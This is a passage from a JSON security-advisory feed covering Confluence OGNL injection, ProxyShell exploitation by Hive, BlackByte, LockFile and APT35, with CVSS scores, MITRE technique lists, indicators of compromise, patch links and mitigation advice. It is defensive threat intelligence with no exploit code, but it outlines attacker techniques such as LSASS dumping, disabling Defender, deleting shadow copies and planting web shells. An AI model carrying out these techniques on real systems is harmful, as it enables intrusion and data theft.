"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-40539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-15T00:00:00", "id": "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "href": "https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:05:52", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "pentestpartners": [{"lastseen": "2023-05-15T15:16:47", "description": "\n\n### Why Now?\n\nHive is not a new problem. It first surfaced in 2021 but it\u2019s becoming a much bigger issue now. This is due to a growing number of affiliates and therefore attacks. 2022 has seen more widespread country and industry target interest too.\n\nRansomware growth in general is becoming a massive problem, so much so that these incidents now make up the majority of UK government [crisis management COBRA meetings](<https://therecord.media/ransomware-incidents-now-make-up-majority-of-british-governments-crisis-management-cobra-meetings/>).\n\n### What is Hive Ransomware?\n\nHive is ransomware-as-a-service (RaaS). It\u2019s maintained by dedicated developers with affiliates using it to conduct high impact ransomware attacks with far reaching consequences.\n\nHive is organised in such a way that they have customer service, help desk, and sales departments. Victims are even directed to log in to a portal to make payment, using credentials the attackers drop in one of the files they leave behind after an attack.\n\n### Who is this Threat Group?\n\nThe Hive gang is a Ransomware as a Service (RaaS) provider first identified in June 2021. Although relatively new, their aggressive tactics and ever evolving malware variants have made them one of the most successful RaaS groups of its kind.\n\nIt's claimed some big victims, for example [Tata Power just one month ago](<https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/>).\n\n### How are they targeting victims?\n\nPhishing emails are sent with malicious payloads (e.g. Cobalt Strike) to get VPN credentials, and then scan for vulnerable remote desktop servers for lateral movement.\n\n### What do they do once they're inside?\n\nIt's all about data exfiltration, with encryption of files on the network.\n\n### Why should I act now?\n\nCybersecurity experts largely believe Hive is allied with Conti. The Hive ransomware gang is just over a year old but has already allied with more traditional ransomware groups, promoting itself as one of the top three most active ransomware groups in July 2022.\n\nThe gang is more active and aggressive than ever, with the affiliates attacking between three to five organisations every day since the operation became known in late June 2021.\n\nOn 17th November 2022 the hacker group claimed responsibility of taking down a USA based health care provider. Hive appears to have demanded a ransom of $900,000. In exchange, the organisation would agree to delete all the data.\n\nTechRepublic amongst other outlets on the on 25th October 2022 named Hive Ransomware within the current top four most dangerous and destructive ransomware groups of 2022. Attacks from this gang alone jumped by 188% from February to March 2022, according to NCC\u2019s March Cyber Threat Pulse report. This ransomware variant was also one of the top four most observed in Q3 of 2022 it is expected to only get more prominent as more affiliates use RaaS with new vulnerabilities such as zero-day attacks to aid in initial intrusion.\n\nIn Q3 2022 Hive ransomware hit 15 countries, with the US and UK being the top targets, respectively.\n\nThe ransomware is super-fast, capable of encrypting 4GB of data per minute. Hive hires penetration testers, access brokers, and other threat actors who continue to develop the threat, techniques, and tactics.\n\nIn May 2022 the gang targeted Costa Rica when the country was reeling from a cyberattack by Conti. Only weeks after the Costa Rican president declared an emergency following that first ransomware attack Hive joined in and crippled the country\u2019s public health service, the Costa Rican Social Security Fund.\n\n### Has it really got more serious? Why should I be concerned?\n\nHive ransomware was last upgraded in July 2022, according to Microsoft Threat Intelligence Centre (MSTIC). Researchers noted that Hive migrated its malware code from GoLang to Rust last month. Rust offers memory, data type, thread safety, deep control over low-level resources, a user-friendly syntax, access to a variety of cryptographic libraries, and is relatively more difficult to reverse-engineer.\n\nThe July update also includes string encryption and more complicated encryption mechanisms that leverage Elliptic Curve Diffie-Hellmann (ECDH) with Curve25519 and XChaCha20-Poly1305 (authenticated encryption with ChaCha20 symmetric cipher). Instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes the sets to the root of the drive it encrypts, both with .key extension.\n\n### I run Linux so I'm OK, right?\n\nHive introduced Linux and FreeBSD encryption capabilities in October 2021. At the time ESET, who discovered these capabilities, clarified that the Linux variant of the ransomware was functionally inadequate compared to its Windows variant. 'Functionally inadequate' doesn't mean that Linux is safe though.\n\n### What have Hives core target industries looked like?\n\nThe industrials sector is still the most common target however hive have broadened their target victims to include energy, resources, agriculture, academic, educational, science institutions, car dealerships, financial, media, electronic distributers and healthcare. In November 2022 Q3, the Hive ransomware hit 15 countries, with the U.S. and the U.K. as the top two targets respectively.\n\n### What can be done to mitigate?\n\nBetter focus on preventing social engineering attacks, adopt defines-in-depth combination of policies, technical defences, and education for end users\u201d Human errors is currently responsible for 82% of data breaches according to Verizon\u2019s 2022 Data Breach Investigations Report.\n\nPatch patch patch! Monitor the CISA\u2019s Known Exploited Vulnerability Catalogue to identify weaknesses.\n\nHive is famously seeking targets using vulnerable Exchange Servers, with some of the critical vulnerabilities and inclusive patch information detailed below:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) - Microsoft Exchange Server Security Feature Bypass Vulnerability\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) - Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) - Microsoft Exchange Server Privilege Escalation Vulnerability\n\nImplement, develop phishing-resistant multi-factor authentication (MFA) technique.\n\nWhere SIEM or ELK Stack solutions are in force, develop the decoders and rules.\n\n### Hive is in my organisation, what happens now and what should I do?\n\nI strongly encourage organisations to start action now to mitigate and reduce the risk and impact of ransomware incidents. Below are areas to focus on when looking at your SIEM, EDR and monitoring solutions.\n\nOnce in your estate Hive ransomware will immediately start working on evasion detection, by executing processes. This is how you deal with it.\n\n**Hive behaviour:** Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption. \n**Advice:** NGAVs will typically pick up on this behaviour these days, however offsite backups should be adopted.\n\n**Hive behaviour:** Remove all existing shadow copies and stop the volume shadow copy services via vssadmin on command line or via PowerShell. \n**Advice:** NGAVs will typically pick up on this behaviour these days, however offsite backups should be adopted.\n\n**Hive behaviour:** Delete Windows event logs, specifically the System, Security and Application logs. \n**Advice:** Make sure you are forwarding logs to an external source that cannot be moved to laterally by the threat actors, ensure logs are also replicated elsewhere or offline storage/backup is utilised which can later be restored.\n\nAlso, implement data backups and encrypt data at rest, also practice your recovery procedures with regular drills.\n\nQuickly isolate any infected devices to prevent the ransomware from spreading further throughout your network. To do this, IT administrators must have up-to-date knowledge of all assets in the organisation and the tools to easily manage them, depending on how far the attack is in progress it may be prudent to shut down affected machines immediately, if backups are not available a provider may be able to perform data carving on offline-disks however this is a long-winded process so concentrate on you most critical data assets.\n\nIf your data has been stolen, take steps to protect your company and notify those who might be affected. It is recommended to report the attack right away to the authorities who may have knowledge of other attacks and can aid in an investigation by sharing knowledge.\n\nContact us if you need help.\n\nThe post [Hive Ransomware is on the rise. How should you deal with it?](<https://www.pentestpartners.com/security-blog/hive-ransomware-is-on-the-rise-how-should-you-deal-with-it/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-18T06:44:42", "type": "pentestpartners", "title": "Hive Ransomware is on the rise. How should you deal with it?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-11-18T06:44:42", "id": "PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446", "href": "https://www.pentestpartners.com/security-blog/hive-ransomware-is-on-the-rise-how-should-you-deal-with-it/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-03-25T05:32:31", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here APT35 aka Magic Hound, an Iranian-backed threat group, has begun using Microsoft Exchange ProxyShell vulnerabilities as an initial attack vector and to execute code through multiple web shells. The group has primarily targeted organizations in the energy, government, and technology sectors based in the United States, the United Kingdom, Saudi Arabia, and the United Arab Emirates, among other countries. The threat actor exploits the Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access to create web shells and disable antivirus services on the victim\u2019s system. To gain persistence in the environment, the threat actor employs both account creation and scheduled tasks. For future re-entry, the account is added to the "remote desktop users" and "local administrator's users" groups. The threat actors use PowerShell to issue multiple commands to disable Windows Defender. Then they create a process memory dump from LSASS.exe that is zipped before exfiltration via web shell. The threat actor uses native Windows programs like "net" and "ipconfig" to enumerate the compromised server. A file masquerading as dllhost.exe is used to access certain domains for command and control. Therefore, data can be exfiltrated by the threat actor which could potentially resulting in information theft and espionage. The Microsoft Exchange ProxyShell vulnerabilities have been fixed in the latest updates from Microsoft. Organizations can patch these vulnerabilities using the patch links given below. The MITRE TTPs commonly used by APT35 are: TA0001: Initial AccessTA0002: ExecutionTA0003: PersistenceTA0004: Privilege EscalationTA0005: Defense EvasionTA0006: Credential AccessTA0007: DiscoveryTA0011: Command and ControlT1190: Exploit Public-Facing ApplicationT1003: OS Credential DumpingT1098: Account ManipulationT1078: Valid AccountsT1105: Ingress Tool TransferT1036: MasqueradingT1036.005: Masquerading: Match Legitimate Name or LocationT1543: Create or Modify System ProcessT1543.003: Create or Modify System Process: Windows ServiceT1505: Server Software ComponentT1505.003: Server Software Component: Web ShellT1082: System Information DiscoveryT1016: System Network Configuration DiscoveryT1033: System Owner/User DiscoveryT1059: Command and Scripting InterpreterT1059.003: Command and Scripting Interpreter: Windows Command Shell Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 References https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T04:05:09", "type": "hivepro", "title": "Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-25T04:05:09", "id": "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "href": "https://www.hivepro.com/magic-hound-exploiting-old-microsoft-exchange-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:20:43", "description": "#### THREAT LEVEL: Red.\n\n \n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/BlackByte-ransomware-exploits-Microsoft-Servers-ProxyShell-vulnerabilities_TA202155.pdf>)\n\nBlackByte ransomware is targeting organizations with unpatched ProxyShell vulnerabilities. Proxy Shell was addressed by hive pro threat researcher in the previous [advisory](<https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/>) released on August 24.\n\nProxyShell is a combination of three flaws in Microsoft Exchange:\n\nCVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control. \nCVE-2021-34523 Privilege escalation vulnerability in the Exchange PowerShell backend. \nCVE-2021-31207 Post-auth remote code execution via arbitrary file write.\n\nThese security flaws are used together by threat actors to perform unauthenticated, remote code execution on vulnerable servers. After exploiting these vulnerabilities, the threat actors then install web shells, coin miners, ransomwares or backdoors on the servers. Attackers then use this web shell to deploy cobalt strike beacon into Windows Update Agent and get the credentials for a service account on compromised servers. The actor then installs Anydesk to gain control of the system and do lateral movement in the organization network. Post exploitation, attackers carry on with using Cobalt Strike to execute the Blackbyte ransomware and encrypt the data.\n\nAffected organizations can decrypt their files using a free decryption tool written by [Trustwave](<https://github.com/SpiderLabs/BlackByteDecryptor>). Users can patch their server for ProxyShell vulnerabilities using the link down below.\n\n**Techniques used by Blackbyte ransomware are :**\n\nT1505.003 Server Software Component: Web Shell \nT1055 Process Injection \nT1059.001 Command and Scripting Interpreter: PowerShell \nT1595.002 Active Scanning: Vulnerability Scanning \nT1027 Obfuscated Files of Information \nT1490 Inhibit System Recovery \nT1112 Modify Registry \nT1562.001 Impair Defenses: Disable or Modify Tools \nT1562.004 Impair Defenses: Disable or Modify System Firewall \nT1018 Remote System Discovery \nT1016 System Network Configuration Discovery \nT1070.004 Indicator Removal on Host: File Deletion \nT1560.001 Archive Collected Data: Archive via Utility\n\n[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n \n\n#### Vulnerability Details\n\n \n\n\n\n \n\n#### Actor Detail\n\n \n\n\n\n \n\n#### Indicators of Compromise(IoCs)\n\n \n\n\n\n \n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n \n\n#### References\n\n<https://redcanary.com/blog/blackbyte-ransomware/>\n\n<https://www.techtarget.com/searchsecurity/news/252510334/BlackByte-ransomware-attacks-exploiting-ProxyShell-flaws>\n\n<https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/>\n\n<https://www.stellarinfo.com/blog/blackbyte-ransomware-attacks-exchange-servers-with-proxyshell-flaws/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T13:24:49", "type": "hivepro", "title": "BlackByte ransomware exploits Microsoft Servers ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-12-07T13:24:49", "id": "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "href": "https://www.hivepro.com/blackbyte-ransomware-exploits-microsoft-servers-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T15:39:16", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Hive Ransomware has been active since its discovery in June 2021, and it is constantly deploying different backdoors, including the Cobalt Strike beacon, on Microsoft Exchange servers that are vulnerable to ProxyShell (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) security flaws. The threat actors then conduct network reconnaissance, obtain admin account credentials, and exfiltrate valuable data before deploying the file-encrypting payload. Hive and their affiliates access their victims' networks by a variety of methods, including phishing emails with malicious attachments, compromised VPN passwords, and exploiting weaknesses on external-facing assets. Furthermore, Hive leaves a plain-text ransom letter threatening to disclose the victim's data on the TOR website 'HiveLeaks' if the victim does not meet the attacker's terms. The Organizations can mitigate the risk by following the recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The MITRE ATT&CK TTPs used by Hive Ransomware are: TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and ControlTA0010: Exfiltration TA0040: ImpactT1190: Exploit Public-Facing ApplicationT1566: PhishingT1566.001: Spear-phishing attachmentT1106: Native APIT1204: User ExecutionT1204.002: Malicious FileT1059: Command and Scripting InterpreterT1059.001: PowerShellT1059.003: Windows Command ShellT1053: Scheduled Task/JobT1053.005: Scheduled TaskT1047: Windows Management InstrumentT1136: Create AccountT1136.002: Domain AccountT1078: Valid AccountsT1078.002: Domain AccountsT1053: Boot or logon autostart executionT1068: Exploitation for Privilege EscalationT1140: Deobfuscate/Decode Files or InformationT1070: Indicator Removal on Host T1070.001: Clear Windows Event LogsT1562: Impair DefensesT1562.001: Disable or Modify ToolsT1003: OS Credential DumpingT1003.005: Cached Domain Credentials|T1018: Remote System DiscoveryT1021: Remote ServicesT1021.001: Remote Desktop ProtocolT1021.002: SMB/Windows admin sharesT1021.006: Windows Remote ManagementT1083: File and directory discoveryT1057: Process discoveryT1063: Security software discoveryT1049: System Network Connections DiscoveryT1135: Network Share DiscoveryT1071: Application Layer ProtocolT1071.001: Web ProtocolsT1570: Lateral tool transfer1486: Data Encrypted for ImpactT1005: Data from local systemT1560: Archive Collected DataT1560.001: Archive via UtilityT1105: Ingress Tool TransferT1567: Exfiltration over web service Actor Details Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches https://millsgrouponline.com/ https://www.fcch.com/ https://www.konradin.de/de/ https://www.pollmann.at/en https://www.emilfrey.ch/de https://rte.com.br/ https://www.friedrich.com/ https://powerhouse1.com/ https://www.hshi.co.kr/eng/ https://www.eurocoininteractive.nl/ https://www.itsinfocom.com/ https://www.pan-energy.com/ https://nsminc.com/ https://www.ucsiuniversity.edu.my/ https://kemlu.go.id/portal/id Patch Links https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 References https://www.varonis.com/blog/hive-ransomware-analysis https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T14:34:47", "type": "hivepro", "title": "Hive Ransomware targets organizations with ProxyShell exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-22T14:34:47", "id": "HIVEPRO:F2305684A25C735549865536AA4254BF", "href": "https://www.hivepro.com/hive-ransomware-targets-organizations-with-proxyshell-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-24T12:00:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202131.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nLockFile, a new ransomware gang, has been active since last week. LockFile began by using a publicly disclosed PetitPotam exploit (CVE-2021-36942) to compromise Windows Domain Controllers earlier this week. Using ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), they've now infiltrated many Microsoft Exchange Servers . The origins of this gang are most likely China. This gang used a similar ransomware note as of LokiBot and is been linked to Conti ransomware due to the email id provided (contact@contipauper[.]com). HivePro Threat Research team advises everyone to patch the vulnerabilities to prevent an attack.\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n**Name** | **Target Locations** | **Target Sectors** | \n---|---|---|--- \nLockFile Ransomware | United States of America and Asia | Manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors | \n \n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 209.14.0.234 \nSHA-2 Hash | ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 \ncafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 \n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 \n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f \n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 \n2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a \n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd \nc020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 \na926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 \n368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 \nd030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a \na0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### References\n\n<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>\n\n<https://www.bleepingcomputer.com/news/security/lockfile-ransomware-uses-petitpotam-attack-to-hijack-windows-domains/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T10:35:48", "type": "hivepro", "title": "ProxyShell and PetitPotam exploits weaponized by LockFile Ransomware Group", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-24T10:35:48", 